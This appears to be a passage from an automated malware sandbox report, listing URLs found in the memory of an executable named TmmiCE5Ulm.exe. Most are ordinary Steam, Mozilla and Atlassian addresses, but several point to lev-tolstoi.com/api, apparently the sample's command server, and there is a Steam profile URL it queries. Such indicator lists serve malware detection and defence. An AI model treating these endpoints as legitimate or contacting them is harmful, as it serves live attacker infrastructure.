Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=e
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: TmmiCE5Ulm.exe, 00000000.00000003.2206551720.0000000005B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: TmmiCE5Ulm.exe, 00000000.00000003.2206551720.0000000005B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: TmmiCE5Ulm.exe, 00000000.00000003.2156635804.0000000005AC1000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156755347.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156870694.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: TmmiCE5Ulm.exe, 00000000.00000003.2156635804.0000000005AC1000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156755347.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156870694.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: TmmiCE5Ulm.exe, 00000000.00000003.2156635804.0000000005AC1000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156755347.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156870694.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: TmmiCE5Ulm.exe, 00000000.00000002.2688215527.00000000011B9000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409438639.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409381050.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/en/
Source: TmmiCE5Ulm.exe, 00000000.00000003.2206551720.0000000005B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: TmmiCE5Ulm.exe, 00000000.00000003.2270145793.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2231698697.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2689933527.0000000005A80000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2205019616.000000000118B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/
Source: TmmiCE5Ulm.exe, 00000000.00000003.2132726091.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001161000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/2
Source: TmmiCE5Ulm.exe, 00000000.00000002.2689933527.0000000005A80000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/=9
Source: TmmiCE5Ulm.exe, 00000000.00000003.2132726091.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2334313230.0000000001128000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001161000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2270285574.0000000001128000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2334452536.000000000112B000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204720643.0000000005B06000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2334313230.0000000001149000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204795356.0000000005B06000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204356484.0000000005B00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/api
Source: TmmiCE5Ulm.exe, 00000000.00000003.2155269616.0000000001154000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/b
Source: TmmiCE5Ulm.exe, 00000000.00000003.2334229101.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2228599565.000000000118B000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204525623.0000000001193000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2205019616.000000000118B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/d
Source: TmmiCE5Ulm.exe, 00000000.00000003.2155269616.0000000001113000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2252932999.00000000011AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/pi
Source: TmmiCE5Ulm.exe, 00000000.00000003.2132726091.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001161000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/pi:
Source: TmmiCE5Ulm.exe, 00000000.00000003.2252932999.00000000011AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/plF
Source: TmmiCE5Ulm.exe, 00000000.00000003.2204525623.0000000001193000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2205019616.000000000118B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/tF
Source: TmmiCE5Ulm.exe, 00000000.00000003.2270285574.0000000001143000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com:443/api
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204525623.000000000118B000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001184000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B06000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688164936.000000000119C000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688215527.00000000011B9000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B06000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409438639.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B06000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688164936.000000000119C000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688215527.00000000011B9000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B06000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409438639.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204525623.000000000118B000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001184000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/
Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/discussions/
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/market/
Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132726091.000000000110D000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/workshop/
Source: TmmiCE5Ulm.exe, 00000000.00000003.2155269616.0000000001184000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132726091.0000000001184000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204525623.000000000118B000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001184000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowere
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2155269616.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132726091.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: TmmiCE5Ulm.exe, 00000000.00000003.2155269616.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132726091.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/about/
Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/explore/
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/legal/
Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/mobile
Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/news/
Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/points/shop/
Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/stats/
Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: TmmiCE5Ulm.exe, 00000000.00000003.2206287989.0000000005DA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: TmmiCE5Ulm.exe, 00000000.00000003.2206287989.0000000005DA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: TmmiCE5Ulm.exe, 00000000.00000002.2688215527.00000000011B9000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409438639.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409381050.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: TmmiCE5Ulm.exe, 00000000.00000003.2206551720.0000000005B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
